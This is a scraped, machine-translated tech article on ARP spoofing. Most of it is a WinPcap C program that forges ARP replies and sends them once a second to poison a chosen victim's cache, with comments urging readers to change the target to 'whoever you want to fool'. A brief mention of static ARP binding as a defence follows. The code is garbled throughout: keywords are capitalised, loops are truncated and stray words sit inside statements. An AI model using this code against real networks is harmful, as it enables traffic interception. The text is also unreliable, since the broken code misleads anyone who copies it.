Shulou(Shulou.com)05/31 Report--

Arp cheating and prevention of cheating example analysis, I believe that many inexperienced people do not know what to do, so this paper summarizes the causes of the problem and solutions, through this article I hope you can solve this problem.

The complete document is as follows: I cheated (172.28.15.32)

/ / WinpCap Test.cpp: defines the entry point for the console application.

/ /

# include "stdafx.h"

# include.h >

Int _ tmain (int argc, _ TCHAR* argv [])

{

Pcap_if_t * allAdapters;// Adapter list

Pcap_if_t * adapter

Pcap_t * adapterHandle;// adapter handle

U_char packet [1020]; / / data packets to be sent

Char errorBuffer [PCAP_ERRBUF_SIZE]; / / error message buffer

If (pcap_findalldevs_ex (PCAP_SRC_IF_STRING, NULL, & allAdapters, errorBuffer) =-1)

{/ / retrieve all network adapters connected to the machine

Fprintf (stderr, "Error in pcap_findalldevs_ex function:% s\\ n", errorBuffer)

Return-1

}

If (allAdapters = = NULL)

{/ / No adapters exist

Printf ("\\ nNo adapters found! Make sure WinPcap is installed.\\ n")

Return 0

}

Int crtAdapter = 0

For (adapter = allAdapters; adapter! = NULL; adapter = adapter- > next)

{/ / traverse input adapter information (name and description information)

Printf ("\\ n%d.%s", + + crtAdapter, adapter- > name)

Printf ("-% s\\ n", adapter- > description)

}

Printf ("\\ n")

/ / Select an adapter

Int adapterNumber

Printf ("Enter the adapter number between 1 and% d:", crtAdapter)

Scanf_s ("d", & adapterNumber)

If (adapterNumber

CrtAdapter)

{

Printf ("\\ nAdapter number out of range.\\ n")

Pcap_freealldevs (allAdapters); / / release the adapter list

Return-1

}

Adapter = allAdapters

For (crtAdapter = 0; crtAdapter)

Next

/ / Open the specified adapter

AdapterHandle = pcap_open (adapter- > name, / / name of the adapter

65536, / / portion of the packet to capture

/ / 65536 guarantees that the whole

/ / packet will be captured

PCAP_OPENFLAG_PROMISCUOUS, / / promiscuous mode

1000, / / read timeout-1 millisecond

NULL, / / authentication on the remote machine

ErrorBuffer / / error buffer

);

If (adapterHandle = = NULL)

{/ / specified adapter failed to open

Fprintf (stderr, "\\ nUnable to open the adapter\\ n", adapter- > name)

/ / release adapter list

Pcap_freealldevs (allAdapters)

Return-1

}

Pcap_freealldevs (allAdapters); / / release the adapter list

/ / create a data packet

Packet [0] = 0xc8; packet [1] = 0x9c; packet [2] = 0xdc; packet [3] = 0x22; packet [4] = 0x62; packet [5] = 0x43; / / mac address of the deceived computer

Packet [6] = 0x00; packet [7] = 0x24; packet [8] = 0x8c; packet [9] = 0x86; packet [10] = 0x43; packet [11] = 91; / / your own mac address

Packet [12] = 0x08; packet [13] = 0x06; / / Ethernet encapsulated arp protocol (do not move)

Packet [14] = 0x00; packet [15] = 0x01; / / arp Field 1: represents Ethernet

Packet [16] = 0x08; packet [17] = 0x00; / / arp Field 2: represents IP protocol

Packet [18] = 0x06; / / arp Field 3: represents the length of the layer 2 address

Packet [19] = 0x04; / / arp Field 4: represents the length of the layer 3 address

Packet [20] = 0x00; packet [21] = 0x02; / / arp Field 5: this is an arp reply message; the following is the 6th, 7th, 8th and 9th fields of arp

Packet [22] = 0xc8; packet [23] = 0x9c; packet [24] = 0xdc; packet [25] = 0x22; packet [26] = 0x62; packet [27] = 0x06; / / false gateway address

Packet [28] = 0xac; packet [29] = 0x1c switch packet [30] = 0x0f; packet [31] = 0xfe; / / ip of the gateway, here is 172.28.15.254 (no change in our laboratory)

Packet [32] = 0xc8; packet [33] = 0x9c; packet [34] = 0xdc; packet [35] = 0x22; packet [36] = 0x62; packet [37] = 0x43; / / mac address of the deceived computer

Packet [38] = 0xac; packet [39] = 0x1c IP [40] = 0x0f; packet [41] = 0x1f; / / the IP address of the deceived computer, here is 172.28.15.19 (change it to whoever you want to fool)

/ / send data packets

For (int ssde=0;ssde

{

Pcap_sendpacket (adapterHandle, packet, 42)

Sleep (1000)

}

System ("PAUSE")

Return 0

}

The way to prevent arp spoofing can bind the mac address to static

Enter arp-a's own IP address, mac address

But it's only temporary, and it's gone when you shut it down and restart it. The arp-d command deletes a static mac address.

After reading the above, have you mastered the method of example analysis of arp deception and prevention of deception? If you want to learn more skills or want to know more about it, you are welcome to follow the industry information channel, thank you for reading!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.